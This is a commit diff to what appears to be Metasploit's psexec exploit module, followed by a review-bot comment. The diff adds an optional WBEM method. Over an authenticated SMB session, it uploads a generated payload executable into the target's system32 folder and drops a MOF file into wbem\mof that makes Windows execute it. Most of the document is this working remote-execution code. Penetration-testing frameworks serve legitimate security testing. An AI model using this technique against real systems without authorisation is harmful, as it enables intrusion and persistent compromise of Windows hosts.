add wbem exec method for psexec as optional, fix #3972, thanks to pbk-df3 for patch
git-svn-id: file:///home/svn/framework3/trunk@12171 4d416f70-5f16-0410-b530-b9f4589650da
parent
b823ea9876
commit
3a6a02e43c
|
@ -33,6 +33,7 @@ class Metasploit3 < Msf::Exploit::Remote
|
||||||
include Msf::Exploit::Remote::SMB::Authenticated
|
include Msf::Exploit::Remote::SMB::Authenticated
|
||||||
include Msf::Auxiliary::Report
|
include Msf::Auxiliary::Report
|
||||||
include Msf::Exploit::EXE
|
include Msf::Exploit::EXE
|
||||||
|
include Msf::Exploit::WbemExec
|
||||||
|
|
||||||
def initialize(info = {})
|
def initialize(info = {})
|
||||||
super(update_info(info,
|
super(update_info(info,
|
||||||
|
@ -85,7 +86,8 @@ class Metasploit3 < Msf::Exploit::Remote
|
||||||
|
|
||||||
register_advanced_options(
|
register_advanced_options(
|
||||||
[
|
[
|
||||||
OptBool.new('DB_REPORT_AUTH', [true, "Report an auth_note upon a successful connection", true])
|
OptBool.new('DB_REPORT_AUTH', [true, "Report an auth_note upon a successful connection", true]),
|
||||||
|
OptBool.new('MOF_UPLOAD_METHOD', [true, "Use WBEM instead of RPC, ADMIN$ share will be mandatory. ( Not compatible with Vista+ )", false])
|
||||||
], self.class)
|
], self.class)
|
||||||
end
|
end
|
||||||
|
|
||||||
|
@ -127,6 +129,34 @@ class Metasploit3 < Msf::Exploit::Remote
|
||||||
report_auth_info(report_hash)
|
report_auth_info(report_hash)
|
||||||
end
|
end
|
||||||
|
|
||||||
|
if datastore['MOF_UPLOAD_METHOD']
|
||||||
|
# payload as exe
|
||||||
|
print_status("Trying wbemexec...")
|
||||||
|
print_status("Uploading Payload...")
|
||||||
|
if datastore['SHARE'] != 'ADMIN$'
|
||||||
|
print_error('Wbem will only work with ADMIN$ share')
|
||||||
|
return
|
||||||
|
end
|
||||||
|
simple.connect("ADMIN$")
|
||||||
|
filename = rand_text_alpha(8) + ".exe"
|
||||||
|
exe = generate_payload_exe
|
||||||
|
fd = smb_open("\\system32\\#{filename}", 'rwct')
|
||||||
|
fd << exe
|
||||||
|
fd.close
|
||||||
|
print_status("Created %SystemRoot%\\system32\\#{filename}")
|
||||||
|
|
||||||
|
# mof to cause execution of above
|
||||||
|
mofname = rand_text_alphanumeric(14) + ".MOF"
|
||||||
|
mof = generate_mof(mofname, filename)
|
||||||
|
print_status("Uploading MOF...")
|
||||||
|
fd = smb_open("\\system32\\wbem\\mof\\#{mofname}", 'rwct')
|
||||||
|
fd << mof
|
||||||
|
fd.close
|
||||||
|
print_status("Created %SystemRoot%\\system32\\wbem\\mof\\#{mofname}")
|
||||||
|
|
||||||
|
# Disconnect from the ADMIN$
|
||||||
|
simple.disconnect("ADMIN$")
|
||||||
|
else
|
||||||
filename = rand_text_alpha(8) + ".exe"
|
filename = rand_text_alpha(8) + ".exe"
|
||||||
servicename = rand_text_alpha(8)
|
servicename = rand_text_alpha(8)
|
||||||
|
|
||||||
|
@ -306,7 +336,7 @@ class Metasploit3 < Msf::Exploit::Remote
|
||||||
raise $!
|
raise $!
|
||||||
rescue ::Exception
|
rescue ::Exception
|
||||||
end
|
end
|
||||||
|
end
|
||||||
handler
|
handler
|
||||||
disconnect
|
disconnect
|
||||||
end
|
end
|
||||||
|
|
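Review bot: The early `return` in the new wbemexec branch (taken when `datastore['SHARE'] != 'ADMIN$'`) exits before the `handler` / `disconnect` calls at the bottom of the method, so the authenticated SMB session appears to stay open on that path, and the guard only runs after "Trying wbemexec..." and "Uploading Payload..." have already been printed. Moving the guard to the first line of the branch and closing the session before leaving, i.e. `disconnect` followed by `return`, would address both. The two `smb_open` / `fd << ...` / `fd.close` sequences have no `ensure`, so a failed write skips `fd.close` and `simple.disconnect("ADMIN$")`. The files written under `%SystemRoot%\system32` and `system32\wbem\mof` are only reported through `print_status`; a comment stating that both remain on the host after the run would help whoever has to clean up or correlate logs after a test. The enclosing method starts above this hunk, so the login and connect sequence is inferred from the context lines.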